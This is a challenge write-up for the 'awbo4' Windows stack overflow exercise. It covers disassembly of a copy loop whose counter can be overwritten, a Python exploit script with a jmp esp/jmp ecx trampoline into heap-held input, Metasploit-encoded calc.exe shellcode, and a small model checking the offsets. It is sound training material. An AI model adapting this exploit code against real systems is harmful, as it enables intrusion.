Advanced Windows Buffer Overflows - Take

Yet another warm summer day in the Basque Country and yet another refreshing take on VRT's very own awbo challenges. Today we will unveil a possible solution for the 3rd test, a.k.a. awbo4. The rules remain the same as in the others: no NOP sleds, no static stack return addresses.

If we feed the binary to IDA we will quickly notice that it doesn't look too complex. The main function just calls one function at 0x00401050, which further analysis reveals to be a wrapper that reads user input from stdin. I want to mention at this point that my lack of reversing skills got me so stuck on understanding how file input was read that I lost a couple of reversing sessions on it, until olly's handle list finally enlightened me.

Once the input vector was clear, the first thing we notice is that the executable copies input to a fixed stack address until the char 'A' is read. This seems like a clear textbook example of a stack-based buffer overflow, but unfortunately there's a little more voodoo involved than just that. During execution there are essentially two counters involving the length of the input. The first one lives inside a FILE-like structure and counts how many bytes are actually read from stdin. This input buffer is capped at a maximum of 4096 bytes and cannot be overflowed, as shown here:
.text:00401570                 lea     eax, [ebp+NumberOfBytesRead]
.text:00401573                 push    0               ; lpOverlapped
.text:00401575                 push    eax             ; lpNumberOfBytesRead
.text:00401576                 mov     eax, [ebx]
.text:00401578                 push    [ebp+nNumberOfBytesToRead] ; 0x1000
.text:0040157B                 push    ecx             ; lpBuffer
.text:0040157C                 push    dword ptr [eax+esi] ; hFile
.text:0040157F                 call    ds:ReadFile
.text:00401585                 test    eax, eax
.text:00401587                 jnz     short readStuff

The second one is placed in the stack frame of the main function. It's a peculiar layout compared to what I have encountered in the past: the local counter is placed after the buffer where we copy our input char by char. The funny thing is that at first look we can't write as much as we want, because on every loop iteration the counter is AND'd with 0xFF. But since the devil is in the details, let's look at this:
.text:00401070                 mov     eax, [ebp-8]    ; stack counter
.text:00401073                 and     eax, 0FFh
.text:00401078                 mov     cl, [ebp-4]
.text:0040107B                 mov     [ebp+eax-88h], cl ; write into stack buffer
.text:00401082                 mov     dl, [ebp-8]
.text:00401085                 add     dl, 1
.text:00401088                 mov     [ebp-8], dl
.text:0040108B                 jmp     short loop

Notice here that even though eax is capped at each iteration, it's then used as the index into the stack buffer at 0x0040107B. This leads to an interesting situation: we can smash the counter value to write our input wherever we want, as long as we take care that the value is not bigger than 0xFF, because otherwise it will be clobbered.

Now that we understand the bug, let's move on to exploitation. There are 128 bytes from the beginning of our input up to the stack counter value. This value is stored as a 4-byte unsigned integer, but as the AND operation showed us, only its lowest byte is used. A few bytes past this 4-byte value we find the return address. In my particular exploit I decided to put the shellcode and everything else after the return address: although we're really close to the top of the stack, we cannot overflow it far enough to cause an access violation, because the index we use into the stack buffer is just a byte long and doesn't allow writes past this boundary.

The trick I used here is that even though we can't have our code on the stack, our whole input is also stored in the heap. The rules say that we can't use hardcoded addresses, but luck is with us this time. After returning from the main function, ecx points towards the middle of our input in the heap (remember, we've just been processing it). In this situation, we will craft the exploit as follows:
# jmp ecx opcode
jmp_ecx = "\xFF\xE1"

# windows/exec - 148 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
shellcode ="\x31\xc9\xbf\xa3\xd2\x6a\x3d\xb1\x1f\xdd\xc7\xd9\x74\x24"
shellcode +="\xf4\x58\x31\x78\x0f\x83\xc0\x04\x03\x78\xa8\x30\x9f\xc1"
shellcode +="\x46\xf0\x60\x3a\x96\x72\x25\x06\x1d\xf8\xa3\x0e\x20\xee"
shellcode +="\x27\xa1\x3a\x7b\x68\x1e\x3b\x90\xde\xd5\x0f\xed\xe0\x07"
shellcode +="\x5e\x31\x7b\x7b\x24\x71\x08\x83\xe5\xb8\xfc\x8a\x27\xd7"
shellcode +="\x0b\xb7\xf3\x0c\xf0\xbd\x1e\xc7\xa7\x19\xe1\x33\x31\xe9"
shellcode +="\xed\x88\x35\xb2\xf1\x0f\xa1\xc6\x15\x9b\x34\x32\xac\xc7"
shellcode +="\x12\xc0\x6d\xa8\x6b\x3e\x11\x01\xe8\x35\x97\x9d\x7b\x09"
shellcode +="\x1b\x55\x0b\x96\x8e\xe2\x84\xae\x59\x0c\xd7\x6f\x33\xbd"
shellcode +="\xb0\x11\x1b\xdf\x32\x86\x03\xde\x3f\x58\x64\xe0\xa7\x06"
shellcode +="\xeb\x72\x4b\xe7\x8e\xf2\xee\xf7"

# return address of jmp esp in ntdll.dll : 0x78461BE3

ret = "\xE3\x1B\x46\x78"

# print everything so we can pipe it to our executable

print "B"*128+"\x88"+"C"*3+ret+jmp_ecx+"\x90"*50+shellcode+"A"

As you can see, we overwrite the counter value with 0x88, which redirects the following writes (after three bytes of padding) onto main's return address and beyond. Once execution returns to the stack through the jmp esp instruction we located inside ntdll.dll, it runs our jmp ecx instruction, which, as I said, lands in the heap where our buffer remains untouched. Also notice the trailing "A", which tells the executable to stop reading user input and exit. As always, the shellcode has been borrowed from Metasploit.com and is just a simple calc.exe launcher. We can pop a nice calculator as follows:
$ ./exp.py | awbo4.exe
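
To double-check the index arithmetic behind the 0x88 trick, here is a small Python 3 model of the copy loop at 0x00401070. Take it as a sketch under assumptions rather than a faithful emulation: the frame is just a dictionary keyed by ebp-relative offsets, the simulate_copy_loop helper and its constants are made up for illustration, the return address is assumed to sit at ebp+4 as in a standard ebp-based frame, and the 'A' check is assumed to happen before each write (the listing does not show that part).

```python
# Hypothetical model of the copy loop; all offsets are relative to ebp.
BUF_OFF = -0x88      # start of the stack buffer ([ebp-88h])
COUNTER_OFF = -0x08  # low byte of the stack counter ([ebp-8])
RET_OFF = 0x04       # return address in a standard ebp-based frame (assumed)


def simulate_copy_loop(data: bytes) -> dict:
    """Replay the byte-by-byte copy and return {ebp_offset: byte}."""
    frame = {COUNTER_OFF: 0}
    for byte in data:
        if byte == ord("A"):                 # assumed terminator check
            break
        index = frame[COUNTER_OFF] & 0xFF    # and eax, 0FFh
        frame[BUF_OFF + index] = byte        # mov [ebp+eax-88h], cl
        # add dl, 1 is an 8-bit add, so the counter byte wraps after 0xFF.
        frame[COUNTER_OFF] = (frame[COUNTER_OFF] + 1) & 0xFF
    return frame


ret = bytes.fromhex("e31b4678")  # 0x78461BE3 in little-endian, as in the exploit
head = b"B" * 128 + b"\x88" + b"C" * 3 + ret + b"A"
frame = simulate_copy_loop(head)

written_ret = bytes(frame[RET_OFF + i] for i in range(4))
print(written_ret.hex())         # e31b4678
print(hex(frame[COUNTER_OFF]))   # 0x90
print(hex(0xFF + BUF_OFF))       # 0x77, highest ebp offset the loop can reach
```

In this model the 129th byte lands on the counter itself, the increment turns it into 0x89, the three "C" bytes fill ebp+1 to ebp+3, and the four address bytes end up at ebp+4. The last line shows the limit imposed by the one-byte index: nothing above ebp+0x77 can be written before the counter wraps back to the start of the buffer.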